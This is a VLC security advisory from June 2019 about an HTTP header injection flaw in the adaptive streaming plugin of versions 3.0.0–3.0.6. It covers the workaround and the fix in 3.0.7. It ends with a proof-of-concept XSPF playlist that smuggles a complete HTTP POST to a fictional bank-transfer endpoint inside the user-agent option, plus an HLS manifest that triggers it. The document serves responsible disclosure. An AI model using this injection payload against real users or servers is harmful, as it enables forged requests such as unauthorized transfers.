Summary : Insufficient input validation HTTP protocol injection vulnerability Date : 10 June 2019 Affected versions : vlc 3.0.6 down to 3.0.0 Impact : Arbitrary HTTP requests CVE ID : unknown/unassigned ID : VLC Trac bug #20813
For unknown reasons, the VLC media player (and underlying LibVLC application library) uses a distinct client implementation of HTTP to perform adaptive network streams such as HTTP Live Streaming (HLS).
Additionally, VLC allows specifying a custom string to use as the HTTP User-Agent header line in HTTP request headers. However, in the case of HTTP adaptive streaming, the custom string is not validated in any way. This allows a malicious network resource to provide an arbitrary byte sequence, including CRLF and thus injects arbitrary header lines in the normal HTTP GET request or even complete arbitrary HTTP request headers (after the GET request).
If successful, a malicious user could use this vulnerability to craft arbitrary HTTP requests, including nonidempotent and potentially requests such as HTTP POST.
An attacker needs to trick the user into opening a crafted playlist manifest.
The only known work-around consists of deleting the adaptive plug-in within the VLC installation, then restarting the application.
The file is normally named libadaptive_plugin.dll, libadaptive_plugin.dylib, or libadaptive_plugin.so depending on the operating system.
Note that this will prevent playing legitimate segmented HTTP streams.
VLC media player version 3.0.7 includes a fix for this issue.
This vulnerability was discovered by Rémi Denis-Courmont, and was not sponsored.
This sample XSPF playlist shows how to set the HTTP User-Agent to inject an HTTP POST request, which the user must be tricked to open:
<?xml version="1.0" encoding="UTF-8"?> <playlist xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/" version="1"> <title>Liste de lecture</title> <trackList> <track> <location>http://www.example.org/stream.m3u8</location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> <vlc:option>http-user-agent=Hacked/0 POST /bank-transfer HTTP/1.1 Host: account.piggy-bank.example.com Content-Length: 12 Hello world!</vlc:option> </extension> </track> </trackList> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:item tid="0"/> </extension> </playlist>
At www.example.org, the following sample manifest can be used to trigger the VLC HTTP adaptive plugin and select the target web server:
#EXTM3U #EXT-X-PLAYLIST-TYPE:VOD #EXT-X-TARGETDURATION:10 #EXT-X-VERSION:3 #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, http://account.piggy-bank.example.com/segment0.ts #EXT-X-ENDLIST